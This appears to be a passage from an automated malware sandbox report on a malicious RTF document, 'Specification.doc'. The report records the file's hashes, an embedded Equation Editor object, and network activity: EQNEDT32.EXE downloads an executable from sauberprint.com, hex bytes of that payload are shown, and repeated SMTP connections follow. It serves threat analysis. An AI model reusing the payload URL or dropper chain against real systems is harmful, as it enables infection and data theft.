                                                                                                        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                        Malicious:false
                                                                                                        Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:Rich Text Format data, unknown version
                                                                                                        Entropy (8bit):4.418464148838647
                                                                                                        TrID:
                                                                                                        • Rich Text Format (5005/1) 55.56%
                                                                                                        • Rich Text Format (4004/1) 44.44%
                                                                                                        File name:Specification.doc
                                                                                                        File size:3803
                                                                                                        MD5:a9c264b36e9a8bcb07dd7caad3e74c7a
                                                                                                        SHA1:b123be7f202496264a25ea58d9b6116eba3de5da
                                                                                                        SHA256:a386ffc6861f5ddad443d3b4d98d91a0bed209b7662e24fbc0bb2478a417d177
                                                                                                        SHA512:3f9b4dcf3aeff7527f32a7e5cab4dff5fb7103bdc76d81e3175840e89328d5a0855195e42f9467f58ad6e4cd97135e76ecad2ea1618a35b2f0fe4f54abb7ad75
                                                                                                        SSDEEP:96:KSkxJttPUYOM+6hVo4ms3X53xHB0yaHn4Y4Om3lvi9y:KSkxJX5J+6hD3J3xhb+4Y499
                                                                                                        File Content Preview:{\rtf9434{\object62152269 \'' \objemb10247329\:\objupdate1102554011025540 \objw3179\objh6628{\*\objdata410639 {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{\bin0000 {\*\ob

                                                                                                        File Icon

                                                                                                        Icon Hash:e4eea2aaa4b4b4a4

                                                                                                        Static RTF Info

                                                                                                        Objects

                                                                                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                        000000106hno
                                                                                                        1000000B8h2embeddedequAtION.31557no

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 14, 2021 10:26:25.207917929 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.359900951 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.359997988 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.360321045 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.512290955 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520526886 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520590067 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520627975 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520677090 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520678997 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520715952 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520723104 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520762920 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520775080 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520782948 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520802975 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520803928 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520842075 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520859003 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520879984 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520906925 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520919085 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.520952940 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.520967960 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.532883883 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.672981024 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673042059 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673083067 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673132896 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673181057 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673217058 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673235893 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673258066 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673264027 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673269033 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673286915 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673302889 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673362970 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673365116 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673418999 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673419952 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673474073 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673479080 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673530102 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673535109 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673585892 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673592091 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673643112 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673649073 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673702955 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673707008 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673758984 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673774004 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673829079 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673852921 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673904896 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673912048 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.673963070 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.673969984 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.674027920 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.674030066 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.674072981 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.674087048 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.674139977 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.675533056 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826157093 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826216936 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826256990 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826297998 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826338053 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826389074 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826435089 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826473951 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826513052 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826531887 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826553106 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826591015 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826630116 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826643944 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826668978 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826695919 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826713085 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826716900 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826761007 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826775074 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826798916 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826811075 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826848030 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826896906 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826936007 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.826957941 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.826975107 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.827013016 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.827054024 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.827064037 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.827107906 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.827260017 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.827301979 CEST8049165143.95.246.178192.168.2.22
                                                                                                        Oct 14, 2021 10:26:25.827332020 CEST4916580192.168.2.22143.95.246.178
                                                                                                        Oct 14, 2021 10:26:25.827339888 CEST8049165143.95.246.178192.168.2.22

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 14, 2021 10:26:25.036048889 CEST5216753192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:26:25.175530910 CEST53521678.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:05.129455090 CEST5059153192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:05.148144007 CEST53505918.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:11.615385056 CEST5780553192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:11.633466959 CEST53578058.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:20.777324915 CEST5561653192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:20.795392036 CEST53556168.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:30.349631071 CEST4997253192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:30.368124008 CEST53499728.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:30.368644953 CEST4997253192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:30.387015104 CEST53499728.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:36.688185930 CEST5177153192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:36.706481934 CEST53517718.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:46.856535912 CEST5986753192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:46.875161886 CEST53598678.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:46.876408100 CEST5986753192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:46.894870996 CEST53598678.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:27:53.415322065 CEST5031553192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:27:53.433789968 CEST53503158.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:28:01.383985043 CEST5007253192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:28:01.401932001 CEST53500728.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:28:10.602905989 CEST5430453192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:28:10.621231079 CEST53543048.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:28:20.852186918 CEST4989453192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:28:20.869642973 CEST53498948.8.8.8192.168.2.22
                                                                                                        Oct 14, 2021 10:28:26.863205910 CEST6464553192.168.2.228.8.8.8
                                                                                                        Oct 14, 2021 10:28:26.881685972 CEST53646458.8.8.8192.168.2.22

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Oct 14, 2021 10:26:25.036048889 CEST192.168.2.228.8.8.80xb4b2Standard query (0)sauberprint.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:05.129455090 CEST192.168.2.228.8.8.80x5ab1Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:11.615385056 CEST192.168.2.228.8.8.80xd7acStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:20.777324915 CEST192.168.2.228.8.8.80x58dcStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:30.349631071 CEST192.168.2.228.8.8.80x80a0Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:30.368644953 CEST192.168.2.228.8.8.80x80a0Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:36.688185930 CEST192.168.2.228.8.8.80x4ee9Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:46.856535912 CEST192.168.2.228.8.8.80xf70eStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:46.876408100 CEST192.168.2.228.8.8.80xf70eStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:53.415322065 CEST192.168.2.228.8.8.80x827cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:01.383985043 CEST192.168.2.228.8.8.80x22faStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:10.602905989 CEST192.168.2.228.8.8.80xdafaStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:20.852186918 CEST192.168.2.228.8.8.80x8082Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:26.863205910 CEST192.168.2.228.8.8.80x6ccbStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Oct 14, 2021 10:26:25.175530910 CEST8.8.8.8192.168.2.220xb4b2No error (0)sauberprint.com143.95.246.178A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:05.148144007 CEST8.8.8.8192.168.2.220x5ab1No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:11.633466959 CEST8.8.8.8192.168.2.220xd7acNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:13.533118010 CEST8.8.8.8192.168.2.220x43c8No error (0)windowsupdate.s.llnwi.net178.79.242.128A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:13.577188969 CEST8.8.8.8192.168.2.220xbb5aNo error (0)windowsupdate.s.llnwi.net178.79.242.128A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:20.795392036 CEST8.8.8.8192.168.2.220x58dcNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:30.368124008 CEST8.8.8.8192.168.2.220x80a0No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:30.387015104 CEST8.8.8.8192.168.2.220x80a0No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:36.706481934 CEST8.8.8.8192.168.2.220x4ee9No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:46.875161886 CEST8.8.8.8192.168.2.220xf70eNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:46.894870996 CEST8.8.8.8192.168.2.220xf70eNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:27:53.433789968 CEST8.8.8.8192.168.2.220x827cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:01.401932001 CEST8.8.8.8192.168.2.220x22faNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:10.621231079 CEST8.8.8.8192.168.2.220xdafaNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:20.869642973 CEST8.8.8.8192.168.2.220x8082No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                        Oct 14, 2021 10:28:26.881685972 CEST8.8.8.8192.168.2.220x6ccbNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • sauberprint.com

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.2249165143.95.246.17880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 14, 2021 10:26:25.360321045 CEST0OUTGET /lupin/booobb.exe HTTP/1.1
                                                                                                        Accept: */*
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                        Host: sauberprint.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Oct 14, 2021 10:26:25.520526886 CEST2INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Thu, 14 Oct 2021 08:26:25 GMT
                                                                                                        Content-Type: application/x-msdownload
                                                                                                        Content-Length: 620544
                                                                                                        Connection: keep-alive
                                                                                                        Last-Modified: Wed, 13 Oct 2021 22:24:09 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 59 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 60 06 00 00 16 03 00 00 00 00 00 fa 7f 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 7f 06 00 4f 00 00 00 00 80 06 00 d4 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 60 06 00 00 20 00 00 00 60 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 03 00 00 80 06 00 00 14 03 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 76 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 7f 06 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 6e 00 00 0c 60 00 00 03 00 00 00 85 00 00 06 a8 ce 00 00 00 b1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1a 00 00 0a 00 00 2a 00 00 13 30 04 00 6d 00 00 00 01 00 00 11 00 1f 20 0a 06 8d 4c 00 00 01 0b 16 0c 2b 4a 00 02 6c 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a fe 05 16 fe 01 0d 09 2c 21 00 07 08 17 9e 02 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a 69 59 10 00 00 2b 04 07 08 16 9e 00 08 17 58 0c 08 07 8e 69 fe 04 13 04 11 04 2d aa 07 13 05 2b 00 11 05 2a 00 00 00 13 30 04 00 43 00 00 00 02 00 00 11 00 16 0a 16 0b 2b 2a 00 02 07 94 17 fe 01 0c 08 2c 1a 06 23 00 00 00 00 00 00 00 40 02 8e 69 07 59 17 59 6c 28 1b 00 00 0a 69 58 0a 00 07 17 58 0b 07 02 8e 69 fe 04 0d 09 2d cc 06 13 04 2b 00 11 04 2a 00 13 30 03 00 34 00 00 00 03 00 00 11 00 18 8d 4e 00 00 01 0b 07 16 72 01 00 00 70 a2 07 17 72 5b 00 00 70 a2 02 16 fe 01 0c 08 2c 08 00 07 16 9a 0a 00 2b 06 00 07 17 9a 0a 00 06 0d 2b 00 09 2a 13 30 03 00 40 00 00 00 04 00 00 11 00 16 0b 28 06 00 00 06 00 00 28 07 00 00 06 00 72 6d 00 00 70 28 1c 00 00 0a 00 28 1d 00 00 0a 0a 06 72 ed 00 00 70 1b 6f 1e 00 00 0a 16 fe 01 0c 08 2c 02 17 0b 00 07 16 fe 01 0d 09 2d ca 2a 6e 00 1f 0a 28 1f 00 00 0a 00 72 f1 00 00 70 28 1c 00 00 0a 00 28 20 00 00 0a 00 2a 13 30 04 00 df 00 00 00 05 00 00 11 00 16 0a 73 11 00 00 06 0b 16 0c 16 0d 16 13 04 16 1f 0a 72 8a 03 00 70 28 0f 00 00 06 8d 09 00 00 02 13 05 11 05 28 0e 00 00 06 00 28 0c 00 00 06 0a 38 99 00 00 00 00 11 05 28 0d 00 00 06 00 28 21 00 00 0a 00 06 16 fe 01 13 06 11 06 2c 2b 00 11 05 12 02 12 03 28 0b 00 00 06 00 11 05 08 9a 25 6f 6e 00 00 06 09 59 6f 6f 00 00 06 00 06 08 09 28 08
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELYga0` @ @O H.text` ` `.rsrcb@@.relocv@BHn`&(*0m L+Jl#@YYl(,!#@YYl(iY+Xi-+*0C+*,#@iYYl(iXXi-+*04Nrpr[p,++*0@((rmp((rpo,-*n(rp(( *0srp(((8((!,+(%onYoo(


                                                                                                        SMTP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                        Oct 14, 2021 10:27:05.532373905 CEST58749166198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:05.532851934 CEST49166587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:05.706798077 CEST58749166198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:05.707554102 CEST49166587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:05.883184910 CEST58749166198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:11.961122990 CEST58749167198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:11.961383104 CEST49167587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:12.122982025 CEST58749167198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:12.123188019 CEST49167587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:12.284459114 CEST58749167198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:21.147293091 CEST58749169198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:21.147842884 CEST49169587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:21.322063923 CEST58749169198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:21.322565079 CEST49169587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:21.496547937 CEST58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:30.745565891 CEST58749170198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:30.757003069 CEST49170587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:30.933882952 CEST58749170198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:30.934087992 CEST49170587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:31.110553980 CEST58749170198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:32.820272923 CEST49170587192.168.2.22198.54.122.60.Y
                                                                                                        W`g`%/O7S'-cM
                                                                                                        Ei?*aw_^rVLJG\3/^^27^!*w5NiSaj]psDK%.*.dwys:7BL/cn]h_^g35%YD\#@#rOT`!1-IxcQV-
